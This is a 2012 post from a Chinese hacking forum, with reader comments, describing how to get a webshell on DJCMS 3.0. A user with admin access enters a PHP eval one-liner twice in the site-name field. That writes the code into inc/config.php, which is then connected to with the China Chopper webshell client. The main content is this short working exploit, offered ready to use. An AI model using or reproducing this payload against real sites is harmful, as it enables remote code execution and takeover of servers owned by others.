DJCMS 3.0后台拿shell

2012-09-13 14:51:11 11 1943 3209

进入后台在其它设置里网站名称插入以下一句话

记住提交两次

");eval($_POST[cmd])?>

然后用菜刀连接

http://www.u.com/inc/config.php

by:xch40

类别 Web安全

关于作者

194323篇文章327篇回复

评论11次

要评论？请先登录或注册

11楼

善良的拖鞋
2012-10-26 11:44

观摩一下

回复|@ta|踩(0)|顶(0)
10楼

p34ch
2012-10-26 10:21

本地测试后，后台程序就乱码了。。继续看看哪里的过滤问题。

回复|@ta|踩(0)|顶(0)
9楼

低调
2012-10-19 11:29

mark！！

回复|@ta|踩(0)|顶(0)
8楼

星天
2012-10-17 15:46

好吧我表示我的两个站都是djcms

回复|@ta|踩(0)|顶(0)
7楼

xiaobai
2012-9-14 21:12

收下了

回复|@ta|踩(0)|顶(0)
6楼

0gussi
2012-9-14 13:20

- -这样的东西就不要发了吧.....直接写入变异一句话到配置文件-_,

回复|@ta|踩(0)|顶(0)
5楼

wepeng
2012-9-13 21:15

收下、、、、、

回复|@ta|踩(0)|顶(0)
4楼

xiehou
2012-9-13 19:54

这算是提交参数的时候没有进行过滤的漏洞吗？

回复|@ta|踩(0)|顶(0)
3楼

ty4z2008
2012-9-13 19:00

和DZ很类似

回复|@ta|踩(0)|顶(0)
2楼

妖妖灵
2012-9-13 18:36

强烈支持原创

回复|@ta|踩(0)|顶(0)
1楼

istice
2012-9-13 17:40

1943 神秘小强本人？

回复|@ta|踩(0)|顶(0)

热门文章

安全资讯基于 Linux 的联想网络摄像头漏洞可被远程利用，引发 BadUSB 攻击

网络安全研究人员披露了联想部分型号网络摄像头的漏洞，这些漏洞 ...

2025-08-10 10:39:35 7 1532

安全资讯【T00ls十七载同行】我的十年网安梦

作为信安专业科班选手，从最开始做技术，到后来网安头部企业安全 ...

2025-08-22 16:09:25 14 8472

安全资讯专访黑客应急专家朽木：百战取证，跨界传灯【T00ls人物专访第十六期】

### 自我介绍大家好，我是朽木。目前担任一家金融公司的安全负责 ...

2025-09-19 15:34:46 15 1792

代码学习用aspx打包tar.gz

有时候环境中无法执行命令，但又需要打包文件，可以用这个脚本as ...

2025-08-27 15:51:19 12 1451

安全资讯专访黑客守夜人没睡的风：内核深耕，近源见真【T00ls人物专访第十七期】

### 自我介绍大家好我是没睡的风破晓团队核心，目前就职于上海 ...

2025-09-26 14:56:27 16 1416

精华推荐

渗透测试渗透某大型菠菜网站

首发于自己的公众号主站注册可以发现jsp和php后缀共存，应该是不 ...

2021-08-03 16:24:22 133 8328

逆向破解yara CS与Agent

### 前言之前做的SLEEP HOOK马没做反沙箱被发微步了，直接标记 ...

2024-08-15 10:01:53 16 769

渗透测试免杀技术有一套（免杀方法大集结）(Anti-AntiVirus)

之前有个表哥(@lostwolf)说要让分享一下免杀技术，这不我发来了 ...

2017-05-22 08:44:16 105 3888

代码学习yunfile网盘多线程破解[php]

为解决广大坛友看片难下片资源少质量差等根本问题特奉献此脚 ...

2013-08-20 13:42:37 92 1981

渗透测试传销站渗透录

零、起因快过年了，拿到了旧电脑，翻出来很多东西。看到论坛对网 ...

2019-01-31 20:55:56 80 5501

Top ↑